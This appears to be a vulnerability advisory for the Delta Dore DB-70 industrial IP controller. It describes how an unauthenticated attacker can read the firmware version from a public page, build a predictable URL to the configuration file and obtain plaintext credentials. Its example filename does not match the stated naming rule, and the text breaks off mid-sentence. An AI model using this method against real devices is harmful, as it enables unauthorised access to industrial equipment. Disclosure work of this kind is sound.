Unauthenticated Configuration File Exposure via Predictable URL in DB-70 / CVE pending
Delta Dore DB-70 is Industrial IP Controller The Delta Dore DB-70 stores its configuration on a static path on the web server. The naming structure for the configuration file is "DB-70_WSA_" + "Application Version without dots" + "_config.bin". For instance, if the application version is 01.04.00, the configuration file would be named "DB-70_WSA_010104_config.bin" . http://xx.yy.zz.tt:8080/admin/DB-70_WSA_010104_config.bin The DB-70 device exposes its application version on the " informations.shtm " web page without requiring any authentication. As a result, anyone can easily retrieve the device's application version. Consequently, an unauthenticated attacker can easily construct a URL to retrieve the device's configuration file without any authentication. This configuration file contains the username and password in plain text, posing a significant security risk. It exposes the device to potential denial-of-service attac...